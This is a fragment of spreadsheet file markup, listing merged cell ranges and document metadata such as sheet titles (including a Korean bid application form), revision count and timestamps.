  <x:mergeCells count="17">
    <x:mergeCell ref="A17:I17"/>
    <x:mergeCell ref="A15:I15"/>
    <x:mergeCell ref="A5:B5"/>
    <x:mergeCell ref="A6:B6"/>
    <x:mergeCell ref="A9:I9"/>
    <x:mergeCell ref="A13:C13"/>
    <x:mergeCell ref="A14:I14"/>
    <x:mergeCell ref="A16:I16"/>
    <x:mergeCell ref="D11:I11"/>
    <x:mergeCell ref="D12:I12"/>
    <x:mergeCell ref="D13:I13"/>
    <x:mergeCell ref="A12:C12"/>
    <x:mergeCell ref="A11:C11"/>
    <x:mergeCell ref="C6:I6"/>
    <x:mergeCell ref="B2:I2"/>
    <x:mergeCell ref="B4:I4"/>
    <x:mergeCell ref="C5:I5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VXXXXXXX</vt:lpstr>
      <vt:lpstr>입찰신청서</vt:lpstr>
    </vt:vector>
  </ep:TitlesOfParts>
  <ep:TotalTime>2383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259</cp:revision>
  <cp:lastPrinted>2021-09-28T07:11:41.967</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-04-03T05:55:52.000</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-16T02:06:14.880</dcterms:modified>
  <cp:version>1200.0100.01</cp:version>
</cp:coreProperties>
</file>